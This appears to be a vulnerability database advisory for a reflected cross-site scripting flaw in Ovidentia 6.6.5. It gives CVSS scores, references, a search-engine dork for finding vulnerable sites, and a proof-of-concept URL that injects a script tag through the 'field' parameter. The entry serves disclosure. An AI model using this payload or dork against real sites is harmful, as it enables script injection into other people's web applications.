Ovidentia 6.6.5 XSS (index.php)

2008.08.19
Credit: mostafa
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Ovidentia 6.6.5 XSS > #Discovered by : ThE dE@Th <mailto:dE@Th> #> # #> #Fr!ends : Bright D@rk <mailto:D@rk> - The-Gh0st - all 3asfh.net Members #> #Script Download : www.ovidentia.org #> # #> #DORK : "Powered by Ovidentia" #> # #> [Bug] http://Site/{path}/index.php?tg=search&pat=abcdefgh&idx=find&navpos=0&navitem=&field=<script>alert(333.45)</script># [Note] # I'm Not a hacker # TNX GOD #

References:

http://www.securityfocus.com/bid/30735
http://www.securityfocus.com/archive/1/archive/1/495562/100/0/threaded
http://secunia.com/advisories/31425


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top